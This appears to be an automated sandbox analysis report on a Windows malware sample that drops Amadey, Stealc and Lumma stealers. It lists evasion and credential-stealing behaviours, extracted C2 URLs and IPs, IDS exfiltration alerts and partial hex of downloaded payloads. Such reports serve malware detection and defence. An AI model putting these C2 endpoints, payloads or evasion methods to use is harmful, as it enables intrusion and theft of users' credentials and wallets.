Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565518
MD5: 27a3277f6daec8e2369a88cea407fb46
SHA1: c7da43b9bc1a51aa28cda592d8266e17057ab6b7
SHA256: ba82209b941924aeb6196fac31a5e2d13193f49be26163683bf29a293b3fcec0
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.206? Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/6802601040/SxQyhJr.exe Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: a6f0d09f38.exe.7620.13.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://atten-supporse.biz:443/api", "Build Version": "LOGS11--LiveTraffi"}
Source: b5da647ae3.exe.5500.14.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 57%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 55% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_cc3844a9-b
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: Binary string: webauthn.pdb source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb@ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]q03f5 source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbL source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Windows\applaunch.pdbpdbnch.pdbdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb; source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: webauthn.pdbGCTL source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a6f0d09f38.exe, 0000000D.00000003.2893559626.00000000084E0000.00000004.00001000.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987390171.00000000063D2000.00000040.00000800.00020000.00000000.sdmp, 8b82d73f70.exe, 00000020.00000002.2915080351.00000000003A2000.00000040.00000001.01000000.0000001A.sdmp, 8b82d73f70.exe, 00000020.00000003.2780938560.00000000050C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.pdbamD source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n4C:\Windows\applaunch.pdbd source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]qKeyT source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: o.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdbeP/ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdblaunch.pdbpdbnch.pdb.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: symbols\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb, source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbs1 source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdbU source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oC:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdbxX($ source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: %%.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbV source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PDB source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.PDBp source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E0EA8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E169Fh 7_2_061E1618
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E169Fh 7_2_061E160A
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E0E98
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E7698
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E7689
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E77B4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E11DB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 222MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49780 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49798 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49816 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49818 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49839 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49879 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49919 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49815 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49877 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49836 -> 104.21.16.9:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://atten-supporse.biz:443/api
Source: Malware configuration extractor IPs: 185.215.113.43
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 31
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:09 GMTContent-Type: application/octet-streamContent-Length: 1473536Last-Modified: Sat, 30 Nov 2024 02:41:31 GMTConnection: keep-aliveETag: "674a7b5b-167c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 79 4a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ec 15 00 00 8e 00 00 00 00 00 00 be 0b 16 00 00 20 00 00 00 20 16 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 16 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 0b 16 00 57 00 00 00 00 20 16 00 fe 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 eb 15 00 00 20 00 00 00 ec 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 fe 8a 00 00 00 20 16 00 00 8c 00 00 00 ee 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 16 00 00 02 00 00 00 7a 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0b 16 00 00 00 00 00 48 00 00 00 02 00 05 00 64 93 14 00 00 78 01 00 03 00 00 00 01 00 00 06 7c a8 00 00 e6 ea 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 73 04 00 00 06 25 6f 02 00 00 06 6f 03 00 00 06 2a b6 02 73 1a 00 00 0a 7d 01 00 00 04 02 7b 01 00 00 04 1b 6f 1b 00 00 0a 02 7b 01 00 00 04 28 08 00 00 06 28 1c 00 00 0a 6f 1d 00 00 0a 2a 1e 02 28 28 00 00 0a 2a 2e 73 06 00 00 06 80 02 00 00 04 2a 1e 02 28 29 00 00 0a 2a 46 03 6f 2a 00 00 0a 72 15 00 00 70 6f 2b 00 00 0a 2a ba 7e 04 00 00 04 3a 1e 00 00 00 72 ad 00 00 70 d0 06 00 00 02 28 23 00 00 0a 6f 33 00 00 0a 73 34 00 00 0a 80 04 00 00 04 7e 04 00 00 04 2a 1a 7e 05 00 00 04 2a 1e 02 80 05 00 00 04 2a 6a 28 0b 00 00 06 72 e9 00 00 70 7e 05 00 00 04 6f 35 00 00 0a 74 02 00 00 1b 2a 22 02 03 7d 27 00 00 04 2a 5e 02 0e 04 1f 18 62 03 1f 10 62 60 04 1e 62 60 05 60 7d 27 00 00 04 2a 72 02 20 00 00 00 ff 6e 03 1f 10 62 6a 60 04 1e 62 6a 60 05 6a 60 6d 7d 27 00 00 04 2a 66 03 02 28 18 00 00 06 02 28 19 00 00 06 02 28 16 00 00 06 73 10 00 00 06 2a 66 02 28 17 00 00 06 03 02 28 19 00 00 06 02 28 16 00 00 06 73 10 00 00 06 2a 66 02 28
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:17 GMTContent-Type: application/octet-streamContent-Length: 1864192Last-Modified: Sat, 30 Nov 2024 03:04:48 GMTConnection: keep-aliveETag: "674a80d0-1c7200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 42 33 47 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e6 03 00 00 c2 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 3a 9b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 60 05 00 70 00 00 00 00 50 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 05 00 00 10 00 00 00 58 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 50 05 00 00 02 00 00 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 05 00 00 02 00 00 00 6a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 70 05 00 00 02 00 00 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 69 6f 64 75 79 62 67 00 e0 19 00 00 d0 2f 00 00 dc 19 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 61 71 76 7a 76 63 69 00 10 00 00 00 b0 49 00 00 06 00 00 00 4a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 49 00 00 22 00 00 00 50 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 